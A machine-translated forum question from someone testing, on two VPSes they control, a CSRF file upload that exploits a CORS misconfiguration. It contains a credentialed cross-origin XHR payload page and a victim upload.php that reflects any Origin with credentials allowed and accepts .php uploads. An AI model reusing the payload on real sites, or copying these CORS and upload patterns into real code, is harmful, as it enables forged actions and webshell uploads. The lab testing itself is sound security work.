通过CORS配置错误导致CSRF fileupload出现问题..... 这个是我的有效载荷...用ajax请求上传一些文件... 我在两个vps中进行了测试......一个被认为是受害者而一个被视为攻击者。
<html>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://165.227.79.228/index.php", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "de-de,de;q=0.8,en-us;q=0.5,en;q=0.3");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------256672629917035");
xhr.withCredentials = "true";
var body = "-----------------------------256672629917035\r\n" +
"Content-Disposition: form-data; name=\"message\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------256672629917035\r\n" +
"Content-Disposition: form-data; name=\"backPage\"\r\n" +
"\r\n" +
"test\r\n" +
"-----------------------------256672629917035\r\n" +
"Content-Disposition: form-data; name=\"dataType\"\r\n" +
"\r\n" +
"test \r\n" +
"-----------------------------256672629917035\r\n" +
"Content-Disposition: form-data; name=\"file\"; filename=\"test2.txt\"\r\n" +
"Content-Type: text/plain\r\n" +
"\r\n" +
"test3\r\n" +
"-----------------------------256672629917035--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="http://165.227.79.228/index.php">
<input type="submit" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
这是在受害者机器中托管的index.php ......
<!DOCTYPE html>
<html>
<body>
<form action="upload.php" method="post" enctype="multipart/form-data">
Select image to upload:
<input type="file" name="fileToUpload" id="fileToUpload">
<input type="submit" value="Upload Image" name="submit">
</form>
</body>
</html>
这是upload.php来处理上传的数据。
<?php
$origin=$_SERVER['HTTP_ORIGIN'];
header('Access-Control-Allow-Origin:' . $origin);
header('Access-Control-Allow-Credentials: true');
$target_dir = "uploads/";
$target_file = $target_dir . basename($_FILES["fileToUpload"]["name"]);
$uploadOk = 1;
$imageFileType = pathinfo($target_file,PATHINFO_EXTENSION);
if(isset($_POST["submit"])) {
$check = getimagesize($_FILES["fileToUpload"]["tmp_name"]);
if($check !== false) {
echo "File is an image - " . $check["mime"] . ".";
$uploadOk = 1;
} else {
echo "File is not an image.";
$uploadOk = 0;
}
}
if (file_exists($target_file)) {
echo "Sorry, file already exists.";
$uploadOk = 0;
}
if ($_FILES["fileToUpload"]["size"] > 500000) {
echo "Sorry, your file is too large.";
$uploadOk = 0;
}
if($imageFileType != "php" && $imageFileType != "txt" && $imageFileType != "jpeg"
&& $imageFileType != "gif" ) {
echo "Sorry, only PHP, TXT,jpeg files are allowed.";
$uploadOk = 0;
}
if ($uploadOk == 0) {
echo "Sorry, your file was not uploaded.";
} else {
if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) {
echo "The file ". basename( $_FILES["fileToUpload"]["name"]). " has been uploaded.";
} else {
echo "Sorry, there was an error uploading your file.";
}
}
?>
XHR请求已成功转移到受害者计算机,但表单未上传到受害方。请帮我。 (我已经尝试了很多方法,但无法解决这个问题...... :-(对不起我的英语技能)